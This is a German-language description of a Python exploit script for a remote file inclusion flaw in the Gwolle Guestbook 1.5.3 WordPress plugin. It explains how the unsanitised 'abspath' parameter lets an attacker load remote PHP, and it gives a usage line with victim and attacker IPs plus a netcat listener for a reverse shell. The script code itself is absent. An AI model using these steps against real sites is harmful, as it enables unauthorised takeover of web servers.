
WordPress-Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
Dieses Python-Skript nutzt eine kritische Remote File Inclusion (RFI)-Schwachstelle im Gwolle Guestbook WordPress Plugin aus, die von einem nicht authentifizierten Angreifer ausgenutzt werden kann, um eine entfernte PHP-Datei einzubinden und beliebigen Code auf dem verwundbaren System auszuführen.
Der HTTP-GET-Parameter "abspath" wird nicht ordnungsgemäß bereinigt, bevor er in der PHP-Funktion require() verwendet wird. Ein entfernter Angreifer kann eine Datei namens 'wp-load.php' von einem beliebigen Remote-Server einbinden und deren Inhalt auf dem verwundbaren Webserver ausführen. Dazu muss der Angreifer eine schädliche 'wp-load.php'-Datei im Document Root seines Servers ablegen und die URL des Servers in die Anfrage einfügen.
Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zur Kompromittierung der gesamten WordPress-Installation führen und möglicherweise sogar die Kompromittierung des gesamten Webservers zur Folge haben.
Das Skript erfordert drei Argumente:
Beispiel:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORTHinweis: Sie müssen auf dem Rechner des Angreifers einen Netcat-Listener auf dem angegebenen Port geöffnet haben.
Dieses Skript dient ausschließlich zu Bildungszwecken. Der Autor übernimmt keine Verantwortung für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.